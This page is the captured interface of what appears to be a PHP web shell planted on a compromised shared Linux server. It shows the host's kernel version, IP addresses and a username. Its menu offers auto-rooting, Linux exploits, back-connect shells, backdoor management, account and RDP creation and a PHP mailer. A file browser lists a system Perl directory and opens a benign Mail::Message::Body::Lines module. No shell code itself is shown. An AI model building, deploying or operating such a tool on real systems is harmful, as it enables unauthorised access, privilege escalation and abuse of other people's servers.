Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Mail /
Message /
Body /
[ HOME SHELL ]
Name
Size
Permission
Action
Construct.pm
3.49
KB
-rw-r--r--
Construct.pod
4.8
KB
-rw-r--r--
Delayed.pm
2.47
KB
-rw-r--r--
Delayed.pod
4.75
KB
-rw-r--r--
Encode.pm
8.54
KB
-rw-r--r--
Encode.pod
6.61
KB
-rw-r--r--
File.pm
5.07
KB
-rw-r--r--
File.pod
11.76
KB
-rw-r--r--
Lines.pm
2.89
KB
-rw-r--r--
Lines.pod
11.41
KB
-rw-r--r--
Multipart.pm
10.81
KB
-rw-r--r--
Multipart.pod
16.86
KB
-rw-r--r--
Nested.pm
3.39
KB
-rw-r--r--
Nested.pod
12.43
KB
-rw-r--r--
String.pm
2.91
KB
-rw-r--r--
String.pod
11.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Lines.pm
# Copyrights 2001-2022 by [Mark Overmeer <markov@cpan.org>]. # For other contributors see ChangeLog. # See the manual pages for details on the licensing terms. # Pod stripped from pm file by OODoc 2.03. # This code is part of distribution Mail-Message. Meta-POD processed with # OODoc into POD and HTML manual-pages. See README.md # Copyright Mark Overmeer. Licensed under the same terms as Perl itself. package Mail::Message::Body::Lines; use vars '$VERSION'; $VERSION = '3.012'; use base 'Mail::Message::Body'; use strict; use warnings; use Mail::Box::Parser; use IO::Lines; use Carp; sub _data_from_filename(@) { my ($self, $filename) = @_; local *IN; unless(open IN, '<', $filename) { $self->log(ERROR => "Unable to read file $filename for message body lines: $!"); return; } $self->{MMBL_array} = [ <IN> ]; close IN; $self; } sub _data_from_filehandle(@) { my ($self, $fh) = @_; $self->{MMBL_array} = ref $fh eq 'Mail::Box::FastScalar' ? $fh->getlines : [ $fh->getlines ]; $self } sub _data_from_glob(@) { my ($self, $fh) = @_; $self->{MMBL_array} = [ <$fh> ]; $self; } sub _data_from_lines(@) { my ($self, $lines) = @_; $lines = [ split /^/, $lines->[0] ] # body passed in one string. if @$lines==1; $self->{MMBL_array} = $lines; $self; } #------------------------------------------ sub clone() { my $self = shift; ref($self)->new(data => [ $self->lines ], based_on => $self); } #------------------------------------------ sub nrLines() { scalar @{shift->{MMBL_array}} } #------------------------------------------ # Optimized to be computed only once. sub size() { my $self = shift; return $self->{MMBL_size} if exists $self->{MMBL_size}; my $size = 0; $size += length $_ foreach @{$self->{MMBL_array}}; $self->{MMBL_size} = $size; } #------------------------------------------ sub string() { join '', @{shift->{MMBL_array}} } #------------------------------------------ sub lines() { wantarray ? @{shift->{MMBL_array}} : shift->{MMBL_array} } #------------------------------------------ sub file() { IO::Lines->new(shift->{MMBL_array}) } #------------------------------------------ sub print(;$) { my $self = shift; my $fh = shift || select; if(ref $fh eq 'GLOB') { print $fh @{$self->{MMBL_array}} } else { $fh->print(@{$self->{MMBL_array}}) } $self; } #------------------------------------------ sub read($$;$@) { my ($self, $parser, $head, $bodytype) = splice @_, 0, 4; my ($begin, $end, $lines) = $parser->bodyAsList(@_); $lines or return undef; $self->fileLocation($begin, $end); $self->{MMBL_array} = $lines; $self; } #------------------------------------------ sub endsOnNewline() { my $last = shift->{MMBL_array}[-1]; !defined $last || $last =~ m/\n$/; } #------------------------------------------ 1;
Close